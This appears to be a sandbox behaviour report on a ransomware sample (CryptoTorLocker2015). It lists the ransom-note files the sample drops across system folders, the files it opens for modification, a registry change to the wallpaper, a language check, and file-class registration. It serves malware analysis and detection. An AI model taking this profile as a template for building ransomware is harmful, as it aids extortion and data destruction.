File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_pssession_details.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Command_Syntax.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\ph3xibc7.inf_amd64_neutral_348f512722c79525\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\ph3xibc9.inf_amd64_neutral_ff3a566e4b6ba035\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnca003.inf_amd64_neutral_8e91d4aa9330d2f8\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\eval\StarterN\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\sppui\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Reserved_Words.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_Comparison_Operators.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\_Default\EnterpriseE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\_Default\UltimateE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ehkpbejmpbejmobe.bmp" C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Common Files\System\ado\en-US\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_settings.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files (x86)\Common Files\System\msadc\it-IT\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Connectivity.gif C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD19563_.GIF C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01840_.GIF C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15169_.GIF C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_Premium.gif C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\7.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_dot.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked-loading.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ECHO\PREVIEW.GIF C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14867_.GIF C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_over.gif C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_snow.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15172_.GIF C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR43F.GIF C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00172_.GIF C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_left_mouseover.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LEVEL\PREVIEW.GIF C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01744_.GIF C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files\Windows NT\TableTextService\TableTextServiceAmharic.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down_BIDI.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files\Microsoft Games\Hearts\it-IT\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\fr\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-disable.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\timer_over.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02752U.BMP C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files\Microsoft Games\Mahjong\es-ES\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\Help\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Australia\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR46B.GIF C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_disable.gif C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\include\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files\Microsoft Games\Mahjong\fr-FR\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR29F.GIF C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_flyout.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21322_.GIF C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\css\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_cloudy.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD15156_.GIF C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Globalization.Extensions\v4.0_4.0.0.0__b03f5f7f11d50a3a\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Providers\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\msil_microsoft.tpm.resources_31bf3856ad364e35_6.1.7600.16385_es-es_9770b2fccce9196c\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\msil_system.web.abstractions_31bf3856ad364e35_6.1.7601.17514_none_070192411bec34df\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\wow64_microsoft-windows-p..noverride.resources_31bf3856ad364e35_6.1.7600.16385_en-us_fcbdc63a822b09a5\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-i..migration.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_196bac53955bfaba\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-w..figwizard.resources_31bf3856ad364e35_6.1.7600.16385_it-it_7c0c8fb2a1b286f0\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ASP.NETWebAdminFiles\Security\Roles\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-memories_31bf3856ad364e35_6.1.7600.16385_none_51190840a935f980\16_9-frame-overlay.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-wab-app_31bf3856ad364e35_6.1.7601.17514_none_a0cf62efee3228a3\verisign.bmp C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-wmpdui.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_78142c772a77958d\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft.windows.h..iverclass.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_aa989395a42b4c87\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ca7ec133e2786d8f\about_modules.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\wow64_microsoft-windows-r..xwddmdriver-wow64-c_31bf3856ad364e35_6.1.7601.17514_none_0f4e7261c2d97332\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-aero.resources_31bf3856ad364e35_6.1.7600.16385_es-es_9606d11873dc4c26\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-f..rant-heap.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_9655fc11af8d5019\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-clock_31bf3856ad364e35_6.1.7600.16385_none_3342e6899aa0557f\square_h.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-r..l-cmdline.resources_31bf3856ad364e35_6.1.7600.16385_it-it_603f5692664da8c3\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-rastapi_31bf3856ad364e35_6.1.7600.16385_none_6ad91c00938e07eb\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-runonce.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_13fb90a2252bc889\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-media-mp3acm.resources_31bf3856ad364e35_6.1.7600.16385_en-us_872be93eaa9f6a40\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-g..ets-slideshowgadget_31bf3856ad364e35_6.1.7600.16385_none_253e8c58002c48e1\icon.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\b204998e0b878089f7fd625612a35dfa\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-scrnsave.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_d60e0225bb629349\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-v..cprovider.resources_31bf3856ad364e35_6.1.7600.16385_it-it_b0d9ff43083875e3\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-w..cture-bsp.resources_31bf3856ad364e35_6.1.7600.16385_de-de_80e558338e88b98f\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_wiaca00d.inf.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_10a649f27418442a\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-bits-client.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_90a36239772dc5bf\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_it-it_aa520d2885499112\about_types.ps1xml.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_prnca00y.inf_31bf3856ad364e35_6.1.7600.16385_none_e98f89fc1f2764a5\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_6.1.7601.17514_pt-br_4ac5907e29b67fa6\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..nterprise.resources_31bf3856ad364e35_6.1.7601.17514_es-es_190509f817d75392\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-time-tool_31bf3856ad364e35_6.1.7600.16385_none_48fe0cfd559f80ad\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-i..emsupport.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_a2422857a3dd5d28\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-rasapi.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ff2b168c11b3c27d\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-i..ptdebugui.resources_31bf3856ad364e35_11.2.9600.16428_en-us_782230ccf6f5f372\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-s..dlinetool.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_34a3f19594e7841a\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-c..ltdel-adm.resources_31bf3856ad364e35_6.1.7600.16385_it-it_2823e1c0b9b01d77\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-n..35cdfcomp.resources_31bf3856ad364e35_6.1.7600.16385_es-es_ab23e226ad0c1160\SqlPersistenceProviderSchema.sql C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-ndis-packetcapture_31bf3856ad364e35_6.1.7600.16385_none_42f0a15ff0f021a4\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..calmediadisc-styles_31bf3856ad364e35_6.1.7600.16385_none_dac1eab162daeb45\Circle_VideoInset.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..dthemes-calligraphy_31bf3856ad364e35_6.1.7600.16385_none_c1407bc73caf8dfc\Windows Notify.wav C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-m..onwizardapplication_31bf3856ad364e35_6.1.7601.17514_none_22f5c6aadf559287\System.gif C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework\v3.0\Windows Workflow Foundation\SQL\it\SqlPersistenceService_Logic.sql C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_prnkm005.inf.resources_31bf3856ad364e35_6.1.7600.16385_es-es_52c993fdf185260a\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_server-help-chm.file_srv.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_4d89a23c740117ff\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_wpf-presentationframework.aero_31bf3856ad364e35_6.1.7600.16385_none_8e78b13e22425483\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\Boot\EFI\el-GR\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-clock_31bf3856ad364e35_6.1.7600.16385_none_3342e6899aa0557f\drag.png C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-searchfolder_31bf3856ad364e35_6.1.7601.17514_none_f8963f65dfec0ddb\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_sisraid2.inf_31bf3856ad364e35_6.1.7600.16385_none_832517589fa2d115\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-s..gtool-app.resources_31bf3856ad364e35_6.1.7600.16385_it-it_92465f8164122a23\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\wow64_microsoft-windows-p..opeerpnrp.resources_31bf3856ad364e35_6.1.7600.16385_es-es_011040f9ee765307\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.7600.16385_sv-se_e71f7ad1e149c2c4\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\wow64_microsoft-windows-i..-wow64-setupdll000a_31bf3856ad364e35_6.1.7600.16385_none_4826d6bacb68758d\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\wow64_microsoft-windows-p..noverride.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_2b8e0e713f710905\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\x86_fundisc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_351cf3c12f2ea766\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\x86_netfx-aspnet_webadmin_appcfg_res_b03f5f7f11d50a3a_6.1.7600.16385_none_237ab8d1f339c9c5\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\x86_wpf-presentationbuildtasks_31bf3856ad364e35_6.1.7601.17514_none_5214a8c9abbda14c\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_nete1e3e.inf.resources_31bf3856ad364e35_6.1.7600.16385_it-it_f9478fef83a24677\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-msmq-runtime_31bf3856ad364e35_6.1.7601.17514_none_a2e93e679472903c\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-onex.resources_31bf3856ad364e35_6.1.7600.16385_en-us_b8b6d9485b260e76\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-s..lprovider.resources_31bf3856ad364e35_6.1.7600.16385_it-it_5a54be1f8ade6a36\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.CryptoTorLocker2015!\ = "PRPASCBHJSZLMOM" C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\ = "CRYPTED!" C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\shell C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
